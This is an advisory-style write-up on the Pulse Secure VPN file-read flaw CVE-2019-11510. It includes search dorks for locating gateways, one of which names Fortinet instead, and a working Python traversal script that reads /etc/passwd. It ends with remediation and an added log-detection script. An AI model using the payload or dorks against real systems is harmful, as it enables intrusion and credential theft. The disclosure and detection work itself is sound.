Pulse Secure SSL VPN Arbitrary File Read (CVE-2019-11510)

August 29, 2019

0x01 Vulnerability Overview

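Pulse Secure Pulse Connect Secure (also known as PCS, formerly Juniper Junos Pulse) is an SSL VPN solution from the US company Pulse Secure. CVE-2019-11510 is caused by a newly introduced feature for accessing other ports through the browser, which lacks security restrictions. Any attacker can exploit the vulnerability without authentication to read sensitive system files and obtain sessions, plaintext passwords and other sensitive information, and can then illegally access and control the VPN and go on to threaten services on the enterprise intranet.
  • Affected versions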
Pulse Secure PCS 9.0RX
Pulse Secure PCS 8.3RX
Pulse Secure PCS 8.2RX
Pulse Secure PCS 8.1R15.1
  • CVE ID
CVE-2019-11510
  • Disclosure date
2019-08-21
  • Component dork
inurl:/dana-na/ filetype:cgi
inurl:remote/login?lang=en
remote/login +app:"Fortinet SSL VPN"

0x02 Exploitation

  • Pcs_Ssl_Vpn_CVE_2019_11510@Coco413.py
#!/usr/bin/env python
# -*- coding:utf-8 -*-

import sys
import urlparse
import requests
import warnings
import traceback

reload(sys)
sys.setdefaultencoding('utf-8')
requests.packages.urllib3.disable_warnings()
warnings.filterwarnings("ignore")

def CVE_2019_11510(base_url):
    try:
        payloads, keywords = "/dana-na/../dana/html5acc/guacamole/../../../../../../../etc/passwd?/dana/html5acc/guacamole/", "root:x"
        r = requests.get(base_url + payloads, verify=False)
        r.close()
        if keywords in r.text:
            print "[✓] Found CVE-2019-11510 Vuln address(curl --path-as-is -s -k <target>):\n{}\n{}".format(
                base_url + payloads, r.content)
        else:
            print "[x] Not Found Vuln!"
    except requests.exceptions.ConnectionError:
        pass
    except requests.ReadTimeout:
        pass
    except Exception:
        traceback.print_exc()

if __name__ == '__main__':
    if len(sys.argv) == 1:
        print '[+] Tip: python Pcs_Ssl_Vpn_CVE_2019_11510@Coco413.py <url>'
        sys.exit(0)
    url = sys.argv[1]
    CVE_2019_11510(urlparse.urlparse(url).scheme + "://" + urlparse.urlparse(url).hostname)

  • Metasploit

Pulse Secure - System file leak


0x03 Remediation

Download the latest version from Pulse Secure to fix the vulnerability: https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44101
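
To check whether the request shape used by the script above has already reached a gateway, the following added example (not part of the original post or of any Pulse Secure tooling) scans web access logs for it. It assumes the logs are available in combined log format, for instance from a reverse proxy in front of the appliance; the function names and sample log lines are constructed for illustration.

```python
import re
from urllib.parse import unquote, urlsplit

# Request line inside a combined-format access log entry (assumed log format).
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})')
GUAC_MARKER = "/dana/html5acc/guacamole/"


def decode_fully(value, rounds=3):
    """Percent-decode repeatedly so %2e%2e and %252e%252e both become '..'."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def is_suspicious(target):
    """True when the request target matches the traversal shape from the PoC."""
    parts = urlsplit(target)
    path = decode_fully(parts.path)
    marker = GUAC_MARKER in path or GUAC_MARKER in decode_fully(parts.query)
    return path.startswith(("/dana-na/", "/dana/")) and "/../" in path and marker


def scan(lines):
    """Return (client_ip, status, target) for every matching log line."""
    hits = []
    for line in lines:
        m = REQUEST_RE.search(line)
        if m and is_suspicious(m.group("target")):
            hits.append((line.split(" ", 1)[0], int(m.group("status")), m.group("target")))
    return hits


# Constructed sample log lines (documentation IP ranges), not real traffic.
SAMPLE = [
    '192.0.2.10 - - [29/Aug/2019:10:00:01 +0000] "GET /dana-na/auth/url_default/welcome.cgi HTTP/1.1" 200 5120',
    '198.51.100.7 - - [29/Aug/2019:10:00:05 +0000] "GET /dana-na/../dana/html5acc/guacamole/../../../../../../../etc/passwd?/dana/html5acc/guacamole/ HTTP/1.1" 200 1874',
    '198.51.100.7 - - [29/Aug/2019:10:00:09 +0000] "GET /dana-na/%2e%2e/dana/html5acc/guacamole/%2e%2e/%2e%2e/etc/passwd?/dana/html5acc/guacamole/ HTTP/1.1" 404 0',
    '203.0.113.4 - - [29/Aug/2019:10:01:00 +0000] "GET /dana/html5acc/guacamole/index.html HTTP/1.1" 200 900',
]

if __name__ == "__main__":
    for ip, status, target in scan(SAMPLE):
        print(ip, status, target)
```

A hit with status 200 means file content was probably returned, so sessions and passwords on that gateway should be treated as exposed even after upgrading.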


0x04 References

[Vulnerability Alert] Pulse Secure SSL VPN Arbitrary File Read